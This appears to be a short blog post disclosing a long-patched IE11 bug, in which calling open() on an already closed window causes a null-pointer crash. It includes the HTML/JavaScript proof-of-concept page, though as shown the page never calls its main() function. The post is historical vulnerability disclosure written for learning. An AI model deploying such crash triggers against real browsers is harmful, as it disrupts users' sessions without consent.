DoS: window.open on a Closed Window

A brief crash report. Calling open() on a window object after it had already been closed caused IE11 to access a null pointer and crash the tab.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>DoS_windowOpen_closedWindow</title>
</head>
<body>
<script language="JavaScript">
var win;
function main()
{
	win = window.open();
	win.close();
	setTimeout("win.open();", 300); // Crash
}
</script>
</body>
</html>

The crash was classified as PROBABLY_NOT_EXPLOITABLE — a null-class pointer read in MSHTML!GetCallerSecurityStateAndURL2. The brief timeout was needed to allow the close to fully complete before the follow-up open() call dereferences the stale window reference.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [Resident Script Execution via onbeforeunload/onunload] :: [DoS: execCommand CreateLink on Mixed-Style Selection] >